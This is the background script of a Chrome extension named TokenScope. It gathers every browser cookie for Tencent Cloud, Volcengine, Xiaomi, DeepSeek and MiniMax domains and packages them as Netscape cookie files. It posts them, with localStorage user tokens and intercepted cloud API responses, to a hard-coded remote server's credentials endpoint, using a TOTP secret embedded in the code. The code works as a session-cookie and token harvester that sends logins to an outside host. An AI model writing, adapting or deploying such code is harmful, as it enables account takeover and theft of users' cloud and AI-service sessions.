// TokenScope Chrome 插件 - 后台服务
const API_BASE = 'https://ait.ll264a.cn';

// ============ TOTP 生成 ============
function base32Decode(str) {
  const chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567';
  str = str.replace(/\s/g, '').toUpperCase();
  let bits = 0, bitLen = 0, bytes = [];
  for (let i = 0; i < str.length; i++) {
    const pos = chars.indexOf(str[i]);
    if (pos === -1) continue;
    bits = (bits << 5) | pos;
    bitLen += 5;
    if (bitLen >= 8) { bitLen -= 8; bytes.push((bits >> bitLen) & 0xff); }
  }
  return new Uint8Array(bytes);
}

async function hmacSha1(key, data) {
  const cryptoKey = await crypto.subtle.importKey('raw', key, { name: 'HMAC', hash: 'SHA-1' }, false, ['sign']);
  return new Uint8Array(await crypto.subtle.sign('HMAC', cryptoKey, data));
}

async function generateTotp(secret) {
  const key = base32Decode(secret);
  const counter = Math.floor(Date.now() / 30000);
  const buf = new ArrayBuffer(8);
  const view = new DataView(buf);
  view.setBigUint64(0, BigInt(counter), false);
  const hmac = await hmacSha1(key, new Uint8Array(buf));
  const offset = hmac[19] & 0xf;
  const code = ((hmac[offset] & 0x7f) << 24) | ((hmac[offset + 1] & 0xff) << 16) | ((hmac[offset + 2] & 0xff) << 8) | (hmac[offset + 3] & 0xff);
  return String(code % 1000000).padStart(6, '0');
}

async function apiWithTotp(method, path, body) {
  // 硬编码默认密钥，storage 清空也不影响
  const DEFAULT_KEY = 'plugin';
  const DEFAULT_SECRET = 'H7FZXWBPF5XUG6IOYIYH';
  const stored = await chrome.storage.local.get(['totpKeyName', 'totpSecret']);
  const totpKeyName = stored.totpKeyName || DEFAULT_KEY;
  const totpSecret = stored.totpSecret || DEFAULT_SECRET;
  const totpCode = await generateTotp(totpSecret);
  const headers = { 'Content-Type': 'application/json', 'X-TOTP-Key': totpKeyName || 'default', 'X-TOTP-Code': totpCode };
  try {
    const resp = await fetch(API_BASE + path, { method, headers, body: body ? JSON.stringify(body) : undefined });
    if (resp.status === 401) return { error: 'TOTP 验证失败，请检查密钥' };
    const data = await resp.json();
    if (!resp.ok) return { error: data.detail || data.error || 'HTTP ' + resp.status };
    return data;
  } catch(e) {
    return { error: '网络错误: ' + e.message };
  }
}

async function collectPlatform(platform, domain) {
  try {
    let allCookies = [];
    // 腾讯云分布在多个域
    const tencentDomains = ['.cloud.tencent.com', '.tencent.com'];
    const domains = platform === 'tencent' ? tencentDomains : [domain];
    
    for (const d of domains) {
      const cookies = await chrome.cookies.getAll({ domain: d });
      allCookies = allCookies.concat(cookies);
    }
    
    if (!allCookies || allCookies.length === 0) return { status: 'no_cookies', platform, count: 0 };
    const seen = new Set();
    const lines = [];
    for (const c of allCookies) {
      const key = c.domain + c.name + c.path;
      if (seen.has(key)) continue;
      seen.add(key);
      lines.push(c.domain + '\t' + (c.domain.startsWith('.') ? 'TRUE' : 'FALSE') + '\t' + (c.path || '/') + '\t' + (c.secure ? 'TRUE' : 'FALSE') + '\t' + Math.floor(c.expirationDate || (Date.now()/1000 + 86400*30)) + '\t' + c.name + '\t' + c.value);
    }
    return { status: 'ok', platform, count: allCookies.length, netscape: '# Netscape HTTP Cookie File\n# Generated by TokenScope Chrome Extension\n# Platform: ' + platform + '\n\n' + lines.join('\n') };
  } catch (e) {
    return { status: 'error', platform, error: e.message };
  }
}

async function pushToServer(platform, netscape) {
  try {
    const result = await apiWithTotp('POST', '/api/admin/credentials', { platform, credential_type: 'cookie', credential_data: netscape, note: 'Chrome Extension' });
    if (result.error) return { success: false, error: result.error };
    return { success: true };
  } catch (e) {
    return { success: false, error: e.message };
  }
}

// ============ 消息分发（所有 handler 都保证发送 sendResponse） ============
chrome.runtime.onMessage.addListener((request, sender, sendResponse) => {
  switch (request.action) {

    case 'generate_totp':
      (async () => {
        try {
          let secret = request.secret;
          let keyName = request.keyName;
          if (!secret) {
            const stored = await chrome.storage.local.get(['totpSecret', 'totpKeyName']);
            secret = stored.totpSecret || 'H7FZXWBPF5XUG6IOYIYH';
            keyName = stored.totpKeyName || 'plugin';
          }
          const code = await generateTotp(secret);
          sendResponse({ code, keyName: keyName || 'plugin' });
        } catch(e) { sendResponse({ error: e.message }); }
      })();
      return true;

    case 'collect':
      collectPlatform(request.platform, request.domain)
        .then(sendResponse)
        .catch(e => sendResponse({ status: 'error', error: e.message }));
      return true;

    case 'push_token':
      (async () => {
        try {
          const result = await apiWithTotp('POST', '/api/admin/credentials', {
            platform: request.platform, credential_type: 'token',
            credential_data: request.token, note: 'userToken from localStorage',
          });
          sendResponse(result.error ? { success: false, error: result.error } : { success: true });
        } catch(e) { sendResponse({ success: false, error: e.message }); }
      })();
      return true;

    case 'push':
      pushToServer(request.platform, request.netscape)
        .then(sendResponse)
        .catch(e => sendResponse({ success: false, error: e.message }));
      return true;

    case 'push_capi_data':
      (async () => {
        try {
          // 包装成数组格式，兼容 PHP 采集器的 foreach 遍历
          const payload = Array.isArray(request.data) ? request.data : [request.data];
          const result = await apiWithTotp('POST', '/api/admin/credentials', {
            platform: 'tencent', credential_type: 'api_data',
            credential_data: JSON.stringify(payload), note: 'CAPI',
          });
          sendResponse(result.error ? { success: false, error: result.error } : { success: true });
        } catch(e) { sendResponse({ success: false, error: e.message }); }
      })();
      return true;

    case 'collect_and_push_cookie':
      (async () => {
        try {
          const collectResult = await collectPlatform(request.platform, request.domain);
          if (collectResult.status === 'ok' && collectResult.netscape) {
            const pushResult = await pushToServer(request.platform, collectResult.netscape);
            sendResponse(pushResult);
          } else {
            sendResponse({ success: false, error: collectResult.error || '无Cookie' });
          }
        } catch(e) { sendResponse({ success: false, error: e.message }); }
      })();
      return true;

    case 'count_cookies':
      (async () => {
        try {
          const tencentDomains = ['.cloud.tencent.com', '.tencent.com'];
          const domains = request.platform === 'tencent' ? tencentDomains : [request.domain];
          let total = 0;
          for (const d of domains) {
            const c = await chrome.cookies.getAll({ domain: d });
            total += c.length;
          }
          sendResponse({ count: total });
        } catch(e) { sendResponse({ count: 0 }); }
      })();
      return true;

    case 'has_auth_cookies':
      (async () => {
        try {
          const tencentDomains = ['.cloud.tencent.com', '.tencent.com'];
          const domains = request.platform === 'tencent' ? tencentDomains : [request.domain];
          let cookies = [];
          for (const d of domains) {
            cookies = cookies.concat(await chrome.cookies.getAll({ domain: d }));
          }
          // 按平台检查关键认证 Cookie（Tencent 不用 cookie 检查，CAPI 拦截才是真检验）
          const needs = {
            volcano: ['volcengine_uid','csrfToken'],
            xiaomi: ['token','userId'],
            deepseek: [],
            minimax: []
          };
          const required = needs[request.platform] || [];
          const names = cookies.map(c => c.name);
          const hasAll = required.length > 0 ? required.every(k => names.includes(k)) : cookies.length > 3;
          sendResponse({ authenticated: hasAll, count: cookies.length });
        } catch(e) { sendResponse({ authenticated: false, error: e.message }); }
      })();
      return true;

    case 'get_login_cred':
      chrome.storage.session.get('login_' + request.platform, d => sendResponse(d['login_' + request.platform] || null));
      return true;

    case 'clear_login_cred':
      chrome.storage.session.remove('login_' + request.platform, () => sendResponse({}));
      return true;

    default:
      sendResponse({ error: 'unknown action' });
  }
});
